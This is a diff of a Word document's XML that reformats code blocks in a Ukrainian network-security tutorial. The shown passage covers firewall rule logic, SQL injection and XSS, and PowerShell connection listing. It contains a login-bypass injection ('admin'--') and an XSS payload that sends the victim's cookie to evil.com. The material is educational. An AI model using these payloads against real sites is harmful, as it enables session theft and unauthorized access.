+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                    ЛОГІКА ПРАВИЛ БРАНДМАУЕРА                          │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Правила перевіряються ПОСЛІДОВНО (зверху вниз)                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Перше правило, що підходить, визначає долю пакета                    │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Приклад набору правил:                                               │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  ┌─────────────────────────────────────────────────────────────────┐  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 1. ALLOW TCP dst-port=443 (HTTPS)                               │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 2. ALLOW TCP dst-port=80  (HTTP)                                │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 3. ALLOW UDP dst-port=53  (DNS)                                 │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 4. ALLOW ICMP type=8      (ping request)                        │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  │ 5. DENY ALL               (все інше заборонено)                 │  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  └─────────────────────────────────────────────────────────────────┘  │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│  Принцип: "Deny by default" — заборонено все, крім явно дозволеного   │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">│                                                                       │</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">│                    ЛОГІКА ПРАВИЛ БРАНДМАУЕРА                          │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">├───────────────────────────────────────────────────────────────────────┤</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  Правила перевіряються ПОСЛІДОВНО (зверху вниз)                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  Перше правило, що підходить, визначає долю пакета                    │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  Приклад набору правил:                                               │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  ┌─────────────────────────────────────────────────────────────────┐  │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │ 1. ALLOW TCP dst-port=443 (HTTPS)                               │  │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │ 2. ALLOW TCP dst-port=80  (HTTP)                                │  │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │ 3. ALLOW UDP dst-port=53  (DNS)                                 │  │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │ 4. ALLOW ICMP type=8      (ping request)                        │  │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  │ 5. DENY ALL               (все інше заборонено)                 │  │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  └─────────────────────────────────────────────────────────────────┘  │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│  Принцип: "Deny by default" — заборонено все, крім явно дозволеного   │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">│                                                                       │</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">└───────────────────────────────────────────────────────────────────────┘</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="10"/>
     <w:bookmarkStart w:id="11" w:name="ids-та-ips"/>
@@ -1090,83 +1188,138 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">-- Вразливий код:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Вразливий код:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">SELECT * FROM users WHERE login='$input' AND pass='$pass'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Атака:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">login: admin'--</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">pass: anything</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Результат:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">SELECT * FROM users WHERE login='admin'--' AND pass='anything'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">-- Коментар '--' ігнорує перевірку пароля</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM users WHERE login='$input' AND pass='$pass'</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-- Атака:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">login: admin'--</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">pass: anything</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-- Результат:</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM users WHERE login='admin'--' AND pass='anything'</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-- Коментар '--' ігнорує перевірку пароля</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1182,56 +1335,111 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;!-- Вразливий код: --&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;!-- Вразливий код: --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;!-- Атака: --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">?name=&lt;script&gt;document.location='http://evil.com/s.php?c='+document.cookie&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">&lt;p&gt;Привіт, &lt;?php echo $_GET['name']; ?&gt;&lt;/p&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;!-- Атака: --&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">?name=&lt;script&gt;document.location='http://evil.com/steal.php?c='+document.cookie&lt;/script&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">&lt;!-- Результат: виконання JavaScript у браузері жертви --&gt;</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1558,83 +1766,138 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve"># Перегляд активних TCP-з'єднань</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд активних TCP-з'єднань</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetTCPConnection | Where-Object State -eq 'Established' |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess |</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">    Sort-Object RemoteAddress</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Перегляд активних UDP-з'єднань</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve"># Визначення процесу за PID</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Get-Process -Id 1234 | Select-Object Name, Path</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">Get-NetTCPConnection | Where-Object State -eq 'Established' |</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Select-Object LocalPort, RemoteAddress, RemotePort, OwningProcess |</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    Sort-Object RemoteAddress</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Перегляд активних UDP-з'єднань</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Get-NetUDPEndpoint | Select-Object LocalPort, OwningProcess</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Визначення процесу за PID</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Get-Process -Id 1234 | Select-Object Name, Path</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="15"/>
     <w:bookmarkStart w:id="16" w:name="linux-bash"/>
@@ -1648,65 +1911,120 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
